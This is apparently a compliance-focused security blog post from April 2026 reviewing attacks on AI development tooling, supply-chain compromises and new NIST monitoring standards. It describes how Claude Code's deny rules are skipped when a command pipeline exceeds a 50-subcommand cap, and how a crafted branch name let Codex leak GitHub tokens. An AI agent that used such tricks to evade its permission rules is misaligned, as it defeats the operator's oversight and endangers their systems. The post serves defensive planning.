Last week, attackers stopped going after AI applications and started going after the tools that build them. CrewAI shipped four critical CVEs, Azure AI Foundry hit CVSS 10.0, Claude Code's deny rules got bypassed, and North Korea weaponized deepfakes for a nation-state npm attack. So let's discuss what compliance teams need to change now.
Safe AI AcademyApril 4, 202613 min read24 views
How AI Toolchain Became the Target
I build AI tools for compliance work. I write agents that read policies, map controls, and flag evidence gaps. So when I read the security headlines, I read them as someone staring at his own workbench, asking a very specific question: is the bench itself safe?
After this week, the honest answer is no.
Last week at RSAC, the story was about securing AI applications. As I wrote then, the industry launched more agentic AI security products in five days than in the prior five years combined. The focus was on runtime protection, agent identity, and data integrity. Fine. That was the story for the apps in production.
This week the target shifted. Attackers and researchers moved upstream, into the tools developers use to build AI in the first place. The frameworks, the SDKs, the coding agents, the model registries, the MCP servers, the package ecosystems. Every layer of the stack I personally sit on shipped a critical vulnerability, got weaponized, or both. Let me walk you through what happened and, more importantly, what it means for how we design controls from here.
The Agentic Framework Slaughter
Start with the CVE table, because the CVE table this week reads like a hit list of the tools I would recommend to a team building their first AI agent.
Get notified when we publish new articles and course announcements.
Claude Code, which I use daily, got its deny rules bypassed. The vulnerability (CC-643) exploits a 50-subcommand hard cap in the permissioning engine. Any pipeline exceeding that cap skips deny rules entirely, which means your carefully configured "never run curl, never touch the production cluster" guardrails simply do not apply when the command pipeline is long enough. Adversa AI found it post-source-leak, after the 512K-line Claude Code source map went public last week. No official patch yet.
Microsoft Azure AI Foundry took a CVSS 10.0 (the same tool that built Entra Agent ID from RCAS), the maximum possible score, for an unauthenticated privilege escalation (CVE-2026-32213). On the same disclosure, Azure MCP Server hit CVSS 9.1 for missing authentication on configuration endpoints (CVE-2026-32211). That is the first major cloud provider's MCP server to take a critical CVE, and it will not be the last.
And if you thought the coding agents were safer, BeyondTrust disclosed a command injection vulnerability in OpenAI Codex that enabled theft of GitHub tokens with full repo read/write scope via a crafted branch name. The vulnerability was noted in December 2025, OpenAI applied multiple patches till this February and only disclosed it then. Your coding agent was exfiltrating your source control credentials, quietly.
I will be honest, I did not expect to see this many critical CVEs in agentic tooling land in a single week. The way I see it, we have entered the phase where security researchers have stopped treating AI frameworks as novelty and started treating them the way they treat Apache, nginx, and OpenSSL. That is the normal maturity curve for any widely deployed infrastructure. The problem is that the frameworks have not matured at the same pace as the scrutiny, and the gap is where the CVEs are being born.
North Korea Learned Deepfakes, and the Mercor Cascade Keeps Cascading
The supply chain story from last week did not slow down. It evolved in two directions, and both deserve attention.
The part that should change how you think about social engineering controls is the intrusion vector. UNC1069 gained access through deepfake impersonation and a fake Slack workspace. This is the first confirmed nation-state attribution for a major npm supply chain attack targeting AI infrastructure, and the initial access was synthetic-media social engineering. The maintainer was not phished. They were video-called by a convincing fake human. Let me put it this way: every employee security awareness training I have ever helped write assumes attackers use email and phone. Those controls now have a blind spot the size of a video conference.
The thing is, this is exactly the scenario compliance frameworks have always been worst at. We write controls around direct vendors and first-tier suppliers. We ask for SOC 2 reports and SIG questionnaires. We almost never have a mechanism to detect that a third-tier dependency buried inside an AI library that our vendor uses got compromised six weeks ago and has been quietly harvesting credentials ever since. The Mercor cascade is going to be a case study in supplier risk management programs for years, and the lesson is not "check your vendors." It is "your vendors do not know what their vendors' AI tooling is doing either."
The Standards Bodies Are Sprinting
I will give credit where it is due. The standards world did not sit still this week. Several publications landed that actually address the problems I just described, even if they are arriving months behind where the threat landscape needs them.
NIST published AI 800-4, "Challenges to Monitoring of Deployed AI Systems," which fills a specific and painful gap in the NIST AI Risk Management Framework. The original NIST AI RMF was heavy on pre-deployment governance and light on what you actually do with an AI system in production. AI 800-4 is the post-deployment monitoring guidance, and it explicitly calls out the challenges of behavioral drift, data distribution shifts, and adversarial probing that do not show up until a system has been live for weeks. This is the document compliance teams needed in 2024. Having it now is still a meaningful upgrade because it gives auditors a reference point for "how are you continuously monitoring this model" that did not exist before.
NIST also opened public comment on an AI Agent Standards Initiative feeding into NISTIR 8596, with an identity concept paper specifically focused on agent identification and authentication. Comments closed April 2. The fact that a federal standards body is moving on agent identity this fast suggests the regulators see the same gap Microsoft saw when they launched Entra Agent ID.
From a internal common control framework (CCF) design perspective, what these updates give us is something we did not have before: external reference frameworks that we can map controls to. When we write a control like "continuous monitoring of deployed AI systems," we now have NIST AI 800-4 to cite. When we write "agent identity and authentication," we have the NISTIR 8596 draft. When we write "agentic supply chain controls," we have OWASP's new agentic security track. A year ago this was all green field. Today, you can actually build a compliance program that maps back to published standards without making it up from scratch.
Mythos, Quantum, and Why 97% of Enterprises Are Right to Be Scared
I want to close with three data points that, taken together, describe the trajectory we are actually on.
First, Anthropic is privately warning the U.S. government that an unreleased model called "Mythos" represents a "watershed moment" for offensive cyber capabilities, specifically the ability to exploit vulnerabilities faster than defenders can respond. I read this and think about what Anthropic usually does with this kind of disclosure. They do not warn the government lightly. They did it for the Claude Code espionage report last November, and the capability story in that report was genuinely alarming. If they are flagging Mythos before release, it means the internal evaluations found something that made their safety team uncomfortable enough to escalate. That is a meaningful signal.
At the end of the day, here is what I take from this week. The attack surface is no longer "your AI application in production." It is the entire toolchain you used to build it: the agentic framework, the coding agent, the MCP servers, the package dependencies, the maintainer accounts, the social engineering layer around those maintainers, and the training data pipelines that feed everything. And the threat actors have figured this out before most compliance programs have.
If you are writing AI controls right now, stop thinking about AI as an application category. Start thinking about AI as an entire software supply chain that happens to include nondeterministic components, and every link in that chain needs its own control coverage. Agent identity, toolchain integrity, dependency monitoring, maintainer authentication (yes, including deepfake detection in your video conferencing controls), post-deployment behavioral monitoring, cryptographic agility, and a kill switch for agents that have started operating outside their intended scope.
This week made one thing very clear: the version of AI compliance we were building six months ago is not going to cover what just happened, and the standards bodies are catching up just in time for the threat landscape to accelerate past them again. Iterate faster. That is the only strategy that actually works.